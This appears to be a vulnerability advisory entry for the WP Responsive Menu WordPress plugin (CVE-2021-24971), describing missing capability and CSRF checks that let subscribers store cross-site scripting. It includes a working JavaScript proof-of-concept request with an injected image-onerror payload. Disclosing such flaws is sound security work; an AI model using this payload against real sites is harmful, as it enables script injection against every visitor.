Lucene search
Krzysztof ZającWPEX-ID:661CB7E3-D7BD-4BC1-BF78-BDB4BA9610D7HistoryJan 26, 2022 - 12:00 a.m.
WP Responsive Menu < 3.1.7.1 - Subscriber+ Settings Update to Stored XSS
2022-01-2600:00:00
Krzysztof Zając
165
0.001 Low
EPSS
Percentile
24.8%
The plugin does not have capability and CSRF checks in the wpr_live_update AJAX action, as well as do not sanitise and escape some of the data submitted. As a result, any authenticated, such as subscriber could update the plugin’s settings and perform Cross-Site Scripting attacks against all visitor and users on the frontend
fetch("https://example.com/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": "action=wpr_live_update&wprmenu_options[enabled]=1&wprmenu_options[position]=\"><img src onerror=alert(/XSS/)>",
"method": "POST",
})
.then(response => response.text())
.then(function(data) {
console.log(data);
fetch("https://example.com/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": "action=wpr_get_transient_from_data",
"method": "POST",
});
});
The XSS will be triggered in all frontend pagesRelated
prion
prion
Cross site scripting
2022-02-28 09:15:00
wpvulndb
wpvulndb
WP Responsive Menu < 3.1.7.1 - Subscriber+ Settings Update to Stored XSS
2022-01-26 00:00:00
cnvd
cnvd
WordPress WP Responsive Menu plugin cross-site scripting vulnerability
2022-03-02 00:00:00
cvelist
cvelist
nvd
nvd
CVE-2021-24971
2022-02-28 09:15:08
cve
cve
CVE-2021-24971
2022-02-28 09:15:08
patchstack
patchstack